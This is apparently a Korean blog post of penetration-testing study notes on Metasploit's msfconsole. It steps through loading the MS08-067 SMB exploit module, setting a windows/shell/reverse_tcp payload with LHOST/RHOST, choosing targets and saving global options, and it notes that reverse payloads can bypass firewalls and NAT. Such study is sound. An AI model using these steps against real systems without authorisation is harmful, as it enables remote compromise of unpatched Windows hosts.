TH3 6R3@T H@CK
MSFconsole 본문
· 메타스플로잇 콘솔 실행: msfconsole 입력

· MSFconsole 도움말: 명령의 결과로 사용법, 도구에 대한 설명, 다양한 옵션 플래그 출력
ex) 호스트와 통신하기 위한 connect 명령의 도움말: help connect

· MS08-067 익스플로잇: 원격 프로시저 호출(RPC) 서비스의 취약점을 공격하는 익스플로잇으로 유명한 컨피커 웜(Conficker worm)에서 사용됐음

· use 명령을 사용해 찾은 모듈 로드 → info 0, use 0, use exploit/windows/smb/ms08_067_netapi
· 다음과 같이 msf 프롬프트 변경
· ms08_067_netapi 모듈이 선택됐고 프롬프트에 입력된 명령으로 익스플로잇을 수행할 수 있음을 보여줌
※ 익스플로잇을 선택한 상황이더라도 아무 때나 다른 익스플로잇이나 모듈을 검색해 선택을 바꿀 수 있음

· 선택한 모듈의 프롬프트에서 show options 명령을 입력해 MS08-067 익스플로잇의 옵션 확인
· 현재 선택한 모듈에서 필요한 옵션 출력

· msf > show payloads
· 메타스플로잇은 특정 공격에 사용할 수 있는 페이로드 유형 식별 가능 → 명령 실행 결과로 윈도우 기반 페이로드만 보임

· 페이로드를 선택하고 → set payload windows/shell/reverse_tcp
· 옵션을 출력하면 → show options
· 페이로드 섹션(Payload options)에서 LHOST, LPORT 같은 추가된 옵션을 볼 수 있음
· 공격자의 시스템으로 연결하는 reverse payload
- 공격자 시스템의 IP 주소와 포트번호를 페이로드에 적용해야 함
- 대상 시스템이 공격자 시스템으로 연결을 시도하고 연결을 맺을 수 있음
- 방화벽이나 NAT 환경을 우회하는 데 사용 가능
- 해당 익스플로잇은 LHOST와 RHOST 옵션을 설정해야 함
- 기본 값인 TCP 포트(4444)를 이용해 대상 시스템(RHOST)에서 LHOST인 공격자 시스템으로 연결 시도

· msf > show targets
· 모듈은 잠재적으로 취약한 대상을 목록화함. → MS08-067 취약점: 하드코딩된 메모리 주소를 이용하기 때문에 특정 운영체제, 패치 레벨, 언어, 버전, 구현된 보안 기술을 고려해야 함
· MS08-067 프롬프트 > show targets > 60여 개의 대상 중 익스플로잇 공격이 가능한 대상만을 보여줌
· 익스플로잇을 성공적으로 수행하려면 공격 대상 윈도우의 버전을 고려해야 함
- Automatic Targeting: 자동으로 공격 대상이 되는 시스템의 운영체제 버전을 식별하고, 시스템 핑거프린트를 이용해 익스플로잇 대상을 선택함
※ 특정 익스플로잇은 요구 조건이 까다롭고, 공격 가능한 운영체제를 찾는 데 많은 시간이 소요됨. 익스플로잇의 기능 테스트가 목적이라면 테스트할 대상을 가상 머신(윈도우 XP SP2)으로 설정해 수행하는 편이 좋음

· info: 모듈에 대한 세부 설명, 옵션, 사용할 대상 확인 가능

· 메타스플로잇 모듈의 옵션 중 required 또는 yes가 표시돼 있으면 set 혹은 unset 명령을 사용해야 함
· set: 옵션 설정
· unset: 설정 해제
※ 변수는 대문자를 사용해 설정. 명령과 변수를 구분하는 좋은 방법

· setg와 unsetg: MSFconsole의 전역 변수를 설정하거나 해제하는 데 사용, LHOST처럼 자주 변경하지 않는 정보를 반복해서 재설정할 필요가 없게 해줌
· save: setg 명령으로 설정한 전역 옵션이 있다면 save 명령으로 현재 설정을 저장해 다음번에 콘솔을 실행할 때도 전역 옵션을 적용시킬 수 있음. 언제든지 메타스플로잇에서 save 명령으로 현재 상태 저장 가능
- /home/kali/ .msf4/config 위치에 설정 정보 저장
- 기본 설정으로 돌아가고 싶으면 설정 파일을 다른 곳으로 이동시키거나 삭제

※ 초기화: back 명령어
'Study > Penetration Test' 카테고리의 다른 글
Reconnaissance: Key Logger (0) | 2024.05.01 |
---|---|
Attacking Web Pages (0) | 2024.04.17 |
Deployment and Expansion (0) | 2024.04.03 |
AGENT (1) | 2024.03.22 |
Reverse Shell (0) | 2024.03.20 |